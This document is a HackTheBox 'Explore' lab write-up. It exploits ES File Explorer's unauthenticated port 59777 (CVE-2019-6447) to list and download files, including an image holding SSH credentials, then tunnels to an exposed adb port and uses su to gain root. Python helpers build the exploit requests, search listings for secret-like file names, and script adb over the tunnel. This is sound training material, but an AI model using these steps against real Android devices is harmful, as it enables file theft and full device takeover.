
HackTheBox: Explore


User

A quick nmap service scan showed only high, non-standard ports:

PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42859/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:19:44 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Sun, 27 Jun 2021 22:19:44 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Sun, 27 Jun 2021 22:19:49 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:19:49 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 27 Jun 2021 22:20:04 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=6/28%Time=60D8F97E%P=x86_64-pc-linux-gnu%r(NU
SF:LL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port42859-TCP:V=7.91%I=7%D=6/28%Time=60D8F97D%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x20
SF:27\x20Jun\x202021\x2022:19:44\x20GMT\r\nContent-Length:\x2022\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\
SF:x20Precondition\x20Failed\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x2022:1
SF:9:44\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\
SF:.0\x20501\x20Not\x20Implemented\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x
SF:2022:19:49\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pla
SF:in;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x2
SF:0supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20R
SF:equest\r\nDate:\x20Sun,\x2027\x20Jun\x202021\x2022:19:49\x20GMT\r\nCont
SF:ent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r
SF:\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:
SF:\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
SF:te:\x20Sun,\x2027\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:\
SF:x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq
SF:,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x2027\x20Jun\x
SF:202021\x2022:20:04\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20
SF:text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\
SF:x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?
SF:\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSe
SF:rverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sun,\x202
SF:7\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:\x2054\r\nContent
SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
SF:\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20msts
SF:hash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Sun,\x2027\x20Jun\x202021\x2022:20:04\x20GMT\r\nContent-Length:
SF:\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0
SF:e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");

A quick search shows that port 59777 belongs to ES File Explorer, a popular Android file manager, not to a Minecraft server as nmap guessed. Vulnerable versions (up to 4.1.9.7.4, tracked as CVE-2019-6447) run an HTTP service on that port that accepts unauthenticated JSON commands, so anyone who can reach it can enumerate and download the device's files. There is a public PoC on GitHub (fs0c131y/ESFileExplorerOpenPortVuln) that wraps those commands.

Running the PoC's listPics command against the box lists the pictures in DCIM, and one name stands out:

python3 poc.py --cmd listPics --host explore.htb
[*] Executing command: listPics on explore.htb
[*] Server responded with: 200

{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}

Fetching creds.jpg (the service serves any file with a plain GET of its device path, which is what the PoC's download command does) and opening it shows a username, kristi, and a password, which work for SSH on port 2222:
(creds.jpg: image of the username and password)
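As an added example (not the PoC's code or the author's), here is what the PoC does on the wire, in Python: the JSON command POST to port 59777, the GET-by-path URL used to pull a file, and a parser for the listing format shown above, which json.loads rejects as-is because of the dangling comma before each closing brace. The sample listing is copied from the output above and the host name explore.htb is the box's; nothing is sent, the request is only built.

```python
import json
import re
from urllib.request import Request

ES_PORT = 59777  # ES File Explorer's HTTP listener, as seen in the nmap scan


def es_command_request(host, command, port=ES_PORT):
    """Build (but do not send) the POST the PoC issues for a command such as
    listPics: a JSON body {"command": ...} to the service root."""
    body = json.dumps({"command": command}).encode()
    return Request(
        f"http://{host}:{port}/",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def es_file_url(host, device_path, port=ES_PORT):
    """Files are served with a plain GET of their absolute on-device path;
    this is the URL the PoC's file download fetches."""
    return f"http://{host}:{port}{device_path}"


def parse_es_listing(text):
    """Turn a listing into a list of dicts.

    The service emits one object per line with a trailing ", " before the
    closing brace and no surrounding array, so strip the dangling commas
    and wrap the whole thing in [] before handing it to json.loads.
    """
    cleaned = re.sub(r",\s*}", "}", text.strip()).rstrip(",")
    return json.loads("[" + cleaned + "]")


def size_bytes(entry):
    """Exact byte count from a size string like '1.14 MB (1,200,401 Bytes)'."""
    m = re.search(r"\(([\d,]+) Bytes\)", entry["size"])
    return int(m.group(1).replace(",", "")) if m else -1


def interesting_files(entries, keywords=("cred", "pass", "key", "secret")):
    """Entries whose name hints at secrets, largest first."""
    hits = [e for e in entries if any(k in e["name"].lower() for k in keywords)]
    return sorted(hits, key=size_bytes, reverse=True)


# The listPics output from the box, copied from the listing above.
SAMPLE_LISTING = """\
{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)"}
"""

if __name__ == "__main__":
    entries = parse_es_listing(SAMPLE_LISTING)
    for e in interesting_files(entries):
        print(e["name"], size_bytes(e), es_file_url("explore.htb", e["location"]))
```

To actually pull a file, open es_file_url(...) with urllib and write the bytes to disk; the same parser works for the other list commands (listFiles, listVideos, listAudios), which use the same line format.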

Root

Kernel exploits went nowhere, so the next step was to look at listening sockets from inside the box. netstat shows a listener on 5555 that nmap never reported, so it is not reachable from outside:

:/ $ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program Name
tcp        0      1 10.129.131.203:38944    8.8.8.8:853             SYN_SENT    -
tcp        0      1 10.129.131.203:44666    1.1.1.1:853             SYN_SENT    -
tcp6       0      0 ::ffff:10.129.131:36443 :::*                    LISTEN      -
tcp6       0      0 :::59777                :::*                    LISTEN      -
tcp6       0      0 ::ffff:127.0.0.1:38185  :::*                    LISTEN      -
tcp6       0      0 :::2222                 :::*                    LISTEN      3347/net.xnano.android.sshserver
tcp6       0      0 :::5555                 :::*                    LISTEN      -
tcp6       0      0 :::42135                :::*                    LISTEN      -
tcp6       0     80 ::ffff:10.129.131.:2222 ::ffff:10.10.14.1:35232 ESTABLISHED 3347/net.xnano.android.sshserver
udp        0      0 0.0.0.0:57030           0.0.0.0:*                           -
udp        0      0 10.129.131.203:24641    1.1.1.1:53              ESTABLISHED -
udp     4352      0 10.129.131.203:68       10.129.0.1:67           ESTABLISHED -
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -
udp6       0      0 :::42555                :::*                                -
udp6       0      0 :::1900                 :::*                                -
udp6       0      0 ::ffff:10.129.131:44968 :::*                                -
udp6       0      0 :::5353                 :::*                                -
udp6       0      0 :::5353                 :::*                                -
udp6       0      0 :::5353                 :::*                                -

Port 5555 is the TCP listener of adbd, the Android Debug Bridge daemon. Whoever can reach it gets a shell as the shell user, and on a device like this one, which accepts the connection without key authorization and ships an unrestricted su, that is one command away from root. Since the port is not reachable from outside, forward it to our host through the SSH access we already have:

ssh -L 5555:localhost:5555 kristi@explore.htb -p 2222

Now adb can be pointed at the forwarded port. The first connect attempt was refused; retrying a moment later succeeded, and su then hands out root with no prompt:

[jusepe@nix:~][0]$ adb connect localhost:5555
Connection refused
[jusepe@nix:~][0]$ adb connect localhost:5555
connected to localhost:5555
[jusepe@nix:~][0]$ adb shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0
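As an added helper (not from the original post), a small Python wrapper around the same adb steps that adds the check a practitioner wants after seeing that refused first attempt: it waits until the forwarded local port actually accepts connections before calling adb connect, and it reads adb's status line instead of assuming success. The adb argv and the forwarded port 5555 are the ones used above; the run and wait parameters are hooks so the logic can be exercised without a device or an ssh tunnel.

```python
import socket
import subprocess
import time

ADB_PORT = 5555  # adbd listener from netstat, reached via ssh -L 5555:localhost:5555


def wait_for_port(host, port, timeout=10.0):
    """Poll until a TCP connect to host:port succeeds; False if it never does
    within timeout. Calling adb before the forward is up is exactly what
    produces 'Connection refused'."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection((host, port), timeout=1.0):
                return True
        except OSError:
            time.sleep(0.2)
    return False


def adb_connect_ok(output):
    """adb connect reports success as 'connected to HOST:PORT' or
    'already connected to HOST:PORT'; anything else (for example
    'Connection refused') means there is no usable device."""
    stripped = output.strip()
    first = stripped.splitlines()[0] if stripped else ""
    return first.startswith("connected to") or first.startswith("already connected to")


def run_cmd(argv):
    """Run a command and return (stdout, stderr) as text."""
    p = subprocess.run(argv, capture_output=True, text=True, check=False)
    return p.stdout, p.stderr


def adb_shell_over_tunnel(command="id", local_port=ADB_PORT, run=run_cmd, wait=wait_for_port):
    """Connect adb to the forwarded port and run one shell command on the box.
    run/wait default to the real implementations above; tests inject fakes."""
    target = f"localhost:{local_port}"
    if not wait("127.0.0.1", local_port, timeout=10.0):
        raise RuntimeError(f"nothing accepting connections on {target}; is the ssh -L forward up?")
    out, err = run(["adb", "connect", target])
    if not adb_connect_ok(out):
        raise RuntimeError(f"adb connect failed: {(out + err).strip()}")
    # -s pins the command to this device in case other emulators are attached.
    out, _ = run(["adb", "-s", target, "shell", command])
    return out


if __name__ == "__main__":
    # With the ssh -L forward from above running, this prints the shell user's id line.
    print(adb_shell_over_tunnel("id"), end="")
```

Once adb shell works, root is the interactive su step shown above; the wrapper deliberately stops at the unprivileged shell so a failed or slow tunnel is reported as such rather than as a missing su.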
Written by ITasahobby, InTernet lover